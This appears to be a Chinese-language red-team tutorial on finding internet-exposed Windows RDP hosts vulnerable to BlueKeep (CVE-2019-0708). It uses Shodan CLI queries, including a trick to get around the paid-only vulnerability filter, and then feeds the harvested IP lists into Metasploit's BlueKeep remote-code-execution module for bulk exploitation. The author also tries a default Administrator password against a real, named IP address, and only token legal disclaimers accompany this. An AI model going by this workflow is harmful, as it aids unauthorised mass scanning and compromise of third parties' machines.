shodan2:绕过shodan高级会员限制+metasploit批量验证漏洞
shodan2
shodan+metasploit批量验证漏洞
shodan的这个指令语法是特别多的,那么我不可能说一个个全部讲完,因为有的参数可能你一辈子都用不上,主要就是把一些红队最常用的参数给你讲完,今天我们看看怎么去查一个cve-2019-0708的一个漏洞
shodan search --limit 10 --fields ip_str,port '"/x03/x00/x00/x0b/x06/xd0/x00/x00/x124/x00"'
十六进制字符串(类似于指纹的方式去找)
绕过shodan高级会员限制
只有高级账号才能用vuln参数,但是如果不能使用vuln参数,也可以通过发散思维来到达同样的结果,比如上面通过指纹,在比如我们指定3389端口,然后使用has_vuln:True参数确定必须有漏洞,这样大概率有cve-2019-0708的一个漏洞,当然了再加上个关键字"port:3389 Remote Desktop Protocol os:windows"就更加准确了
shodan search --limit 10 --fields ip_str,port "port:3389 Remote Desktop Protocol os:windows" has_vuln:True
![[Pasted image 20241027022845.png]]
如果可以使用vuln参数,可以直接使用
shodan download --limit 100 --fields ip_str vuln:"CVE-2019-0708" country:jp
metasploit批量验证漏洞
- 有漏洞不代表能利用,用windows远程连接看看主机是否存活110.35.235.228远程链接出现,测试弱口令Administrator&Administrator,无法连接不过没事。
- 我们可以使用metasploit去进行批量的漏洞利用
search 0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set rhosts file:拖入IP地址文件
checkshow targets(查看帮助文档)
![[Pasted image 20241027012246.png]]
攻击不成功有几个点给大家说一下首先show options看请我们的这个pay load,ip端口要填对,在一个就是show targets它支持windows7,sever这种,你得把targets设置正确,然后我就不演示了。怕有人干坏事好吧,这样找漏洞是不是特别的方便呢。
shodan语法:parse、downIoad
今天接着讲两个参数,一个是parse一个是downIoad(下载)
我们首先看看这个downIoad
download(下载)
查看帮助文档
shodan download -hUsage: shodan download [OPTIONS] <filename> <search query>Download search results and save them in a compressed JSON file.Options:--fields TEXT Specify the list of properties to download instead ofgrabbing the full banner--limit INTEGER The number of results you want to download. -1 to downloadall the data possible.-h, --help Show this message and exit.
使用实例
shodan download [OPTIONS] <filename> <search query>
shodan download <文件名> <搜索查询> [选项]shodan download 0708 --limit 10 --fields ip_str,port '"/x03/x00/x00/x0b/x06/xd0/x00/x00/x124/x00"'
0708是文件名有钱的直接使用vuln参数就行
shodan download cve-2019-0708 --limit 10 vuln:"CVE-2019-0708"
![[Pasted image 20241026230154.png]]
parse(解压)
shodan parse -h(查看帮助文档)Usage: shodan parse [OPTIONS] <filenames>Extract information out of compressed JSON files.Options:--color / --no-color--fields TEXT List of properties to output.-f, --filters TEXT Filter the results for specific values using key:valuepairs.-O, --filename TEXT Save the filtered results in the given file (append iffile exists).--separator TEXT The separator between the properties of the searchresults.-h, --help Show this message and exit.
使用
shodan parse --fields ip_str <文件名>shodan parse --fields ip_str '/home/kali/桌面/cve-2019-0708.json.gz' >0708>0708表示将解压内容输入到0708文件里面
这就是一个批量刷漏洞的姿势好吧,希望大家遵纪守法,
为什么不用,shodan search vuln:cve-2019-0708这种可能是说要更高级别的账号好吧我们换种方式照样绕过它去批量刷洞
参考
【shodan(2)】https://www.bilibili.com/video/BV1ePyDYEE9b?vd_source=6a7d9c477e11fffc54155ce1c6cf0c1c